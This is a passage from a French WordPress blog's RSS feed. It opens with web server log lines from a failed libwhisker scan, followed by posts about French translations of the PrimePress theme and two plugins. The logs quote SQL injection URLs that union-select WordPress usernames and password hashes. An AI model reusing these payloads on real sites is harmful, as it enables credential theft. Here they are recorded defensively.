94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">42</span> +0100] <span style="color: #7f007f;">&quot;GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6%20from%20wp_users-- HTTP/1.1&quot;</span> <span style="color: #ff0000;">404</span> <span style="color: #ff0000;">16251</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">43</span> +0100] <span style="color: #7f007f;">&quot;GET /index.php?page_id=115&amp;amp;forumaction=showprofile&amp;amp;user=1+union+select+null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null+from+wp_tbv_users/* HTTP/1.1&quot;</span> <span style="color: #ff0000;">301</span> - <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span>
94.247.3.38 - - [<span style="color: #ff0000;">13</span>/Jan/<span style="color: #ff0000;">2009</span>:<span style="color: #ff0000;">14</span>:<span style="color: #ff0000;">10</span>:<span style="color: #ff0000;">44</span> +0100] <span style="color: #7f007f;">&quot;GET / HTTP/1.1&quot;</span> <span style="color: #ff0000;">200</span> <span style="color: #ff0000;">16299</span> <span style="color: #7f007f;">&quot;-&quot;</span> <span style="color: #7f007f;">&quot;Mozilla (libwhisker/2.4)&quot;</span></pre></td></tr></table></div>

<p>Ces requêtes ont été faites avec libwhisker. Elles ont été effectuées sur la page de login sans succès ou sur des plugins WordPress que je n&#8217;ai pas installé. Elles ont aussi tenté de faire des injections SQL dans la base de données sans plus de succès.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.duretz.net/2009/01/14/a-libwhisker-attack/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>PrimePress en français</title>
		<link>http://www.duretz.net/2009/01/05/primepress-french-translation/</link>
		<comments>http://www.duretz.net/2009/01/05/primepress-french-translation/#comments</comments>
		<pubDate>Mon, 05 Jan 2009 12:47:08 +0000</pubDate>
		<dc:creator>Laurent Duretz</dc:creator>
				<category><![CDATA[Technologie]]></category>
		<category><![CDATA[theme]]></category>
		<category><![CDATA[translation]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.duretz.net/?p=136</guid>
		<description><![CDATA[J&#8217;ai décidé de traduire le theme WordPress PrimePress pour l&#8217;un de mes sites.
Basée sur la version v1.3.1 du thème original, cette mise à jour inclut quelques changements pour faciliter le traduction :

Ajout des fonctions _e() et __() de WordPress
Modification mineures des phrases originales (sans  [...]]]></description>
			<content:encoded><![CDATA[<p>J&#8217;ai décidé de traduire le theme WordPress PrimePress pour l&#8217;un de mes sites.</p>
<p>Basée sur la version v1.3.1 du thème original, cette mise à jour inclut quelques changements pour faciliter le traduction :<span id="more-136"></span></p>
<ul>
<li>Ajout des fonctions _e() et __() de WordPress</li>
<li>Modification mineures des phrases originales (sans changements dans le rendu)</li>
<li>Ajout des fichiers MO et PO pour la langue française</li>
</ul>
<p>Notez que les formats de date et d&#8217;heure n&#8217;ont pas été modifiés car cela est fait par le plugin Language Switcher.</p>
<p>Ce thème WordPress a été complètement testé avec WordPress 2.7 et FireFox 3.</p>
<p>Vous pouvez <a href="http://www.duretz.net/wp-content/uploads/2009/01/primepress.zip">le télécharger ici</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.duretz.net/2009/01/05/primepress-french-translation/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Flexi Pages Widget en français</title>
		<link>http://www.duretz.net/2008/12/12/flexi-pages-widget-translation/</link>
		<comments>http://www.duretz.net/2008/12/12/flexi-pages-widget-translation/#comments</comments>
		<pubDate>Fri, 12 Dec 2008 10:41:04 +0000</pubDate>
		<dc:creator>Laurent Duretz</dc:creator>
				<category><![CDATA[Technologie]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[translation]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.duretz.net/?p=134</guid>
		<description><![CDATA[Avant de migrer ce site vers la version 2.7  de WordPress , j&#8217;ai décidé d&#8217;internationaliser et/ou traduire tous les plugins qu&#8217;il utilise. De cette façon, je vérifie qu&#8217;ils fonctionnent avec le nouveau WordPress et me familiarise avec la dernière version de ce CMS.
Le premier plugin est donc Flexi  [...]]]></description>
			<content:encoded><![CDATA[<p>Avant de migrer ce site vers la version 2.7  de WordPress , j&#8217;ai décidé d&#8217;internationaliser et/ou traduire tous les plugins qu&#8217;il utilise. De cette façon, je vérifie qu&#8217;ils fonctionnent avec le nouveau WordPress et me familiarise avec la dernière version de ce CMS.</p>
<p>Le premier plugin est donc <a href="http://srinig.com/wordpress/plugins/flexi-pages/">Flexi Pages Widget</a>.</p>
<p><span id="more-134"></span></p>
<p>Les modifications apportées dans le codes sont :</p>
<ul>
<li>Suppresion des warnings envoyés lorsque WordPress tourne en mode debug</li>
<li>Insertion des fonctions load_plugin_textdomain(), __() et _e() pour l&#8217;internationalisation</li>
<li>Nouveaux fichiers de langue MO, PO et POT</li>
<li>Support de la langue française</li>
</ul>
<p>Toutes les modifications ont été testées sur WP 2.7.0.</p>
<p>J&#8217;ai contacté l&#8217;auteur pour qu&#8217;il inclue ces modifications dans la version officielle.</p>
<p>Si vous ne supportez pas d&#8217;attendre, vous pouvez télécharger l&#8217;archive <a href="http://www.duretz.net/wp-content/uploads/2008/12/flexi-pages-widget.zip">ici</a>.</p>
<p>Amusez vous bien !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.duretz.net/2008/12/12/flexi-pages-widget-translation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Viper&#8217;s Video Quicktags en français</title>
		<link>http://www.duretz.net/2008/12/05/vipers-video-quicktags-in-french/</link>
		<comments>http://www.duretz.net/2008/12/05/vipers-video-quicktags-in-french/#comments</comments>
		<pubDate>Fri, 05 Dec 2008 09:24:18 +0000</pubDate>
		<dc:creator>Laurent Duretz</dc:creator>
				<category><![CDATA[Technologie]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[translation]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.duretz.net/?p=131</guid>
		<description><![CDATA[Pour remplcer le plugin WP YouTube sur ce site, j&#8217;ai décidé d&#8217;utiliser le plugin Viper&#8217;s Video Quicktag qui me semble :

Plus complet
Plus paramètrable
Plus facile à traduire

Ce plugin écrit à l&#8217;origine en anglais est déjà traduit en russe et en italien. La seule chose qui me restait à a faire  [...]]]></description>
			<content:encoded><![CDATA[<p>Pour remplcer le plugin <a title="WP YouTube plugin on WordPress" href="http://wordpress.org/extend/plugins/wp-youtube/">WP YouTube</a> sur ce site, j&#8217;ai décidé d&#8217;utiliser le plugin Viper&#8217;s Video Quicktag qui me semble :</p>
<ul>
<li>Plus complet</li>
<li>Plus paramètrable</li>
<li>Plus facile à traduire</li>
</ul>
<p>Ce plugin écrit à l&#8217;origine en anglais est déjà traduit en russe et en italien. La seule chose qui me restait à a faire était de remplir le fichier MO.</p>
<p><span id="more-131"></span>Néanmoins, j&#8217;ai corrigé 2 types de bugs mineurs au cours de ce travail :</p>
<ul>
<li>Les Warnings envoyés lorsque WordPress tourne en mode debug</li>
<li>Les liens manquants vers le domaine de traduction du plugin dans les méthodes __() et _e()</li>
</ul>
<p>Toutes les modifications ont été testées sur WP 2.6.5 et WP 2.7.0-Beta3.</p>
<p>J&#8217;ai contacté l&#8217;auteur pour qu&#8217;il inclue ces modifications dans la version officielle.</p>
<p>Si vous ne supportez pas d&#8217;attendre, vous pouvez télécharger l&#8217;archive <a href="http://www.duretz.net/wp-content/uploads/2008/12/vipers-video-quicktags.zip">ici</a>.</p>
<p>Amusez vous bien !</p>
]]></content:encoded>
			<wfw:commentRss>http://www.duretz.net/2008/12/05/vipers-video-quicktags-in-french/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

